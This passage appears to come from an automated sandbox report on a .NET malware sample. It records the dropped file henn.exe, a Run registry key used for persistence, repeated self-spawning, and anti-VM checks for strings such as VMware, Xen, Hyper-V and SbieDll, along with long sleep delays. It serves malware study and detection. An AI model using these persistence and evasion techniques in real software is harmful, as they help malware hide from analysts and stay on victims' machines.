                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73379ae8.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73379ae8.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73329ab0.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73329ab0.7.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73329ab0.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73329ab0.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73329ab0.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c7bb30000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c7bb30000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c7bb30000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c7bb30000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c7bb30000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c61a10000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133776369.0000017C61A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe PID: 5896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 5788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: henn.exe PID: 4352, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF848F2A9E8 push ss; iretd 0_2_00007FF848F2A9EB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF849010188 push eax; ret 0_2_00007FF849010189
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 12_2_00007FF848F4A9E8 push ss; iretd 12_2_00007FF848F4A9EB
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 12_2_00007FF848F400BD pushad ; iretd 12_2_00007FF848F400C1
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 24_2_00007FF848F97301 push ds; ret 24_2_00007FF848F97324
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 24_2_00007FF848F400BD pushad ; iretd 24_2_00007FF848F400C1
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 24_2_00007FF848F4A9E8 push ss; iretd 24_2_00007FF848F4A9EB
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 24_2_00007FF849030D48 pushad ; retf 24_2_00007FF849030F89
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeFile created: C:\Users\user\AppData\Roaming\henn.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hennJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hennJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe TID: 6632Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe TID: 2316Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exe TID: 1628Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exe TID: 3524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exe TID: 1876Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exe TID: 5240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133513234.0000017C617C2000.00000004.00000020.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2284542088.000001D7BADC3000.00000004.00000020.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350105872.000002159137D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
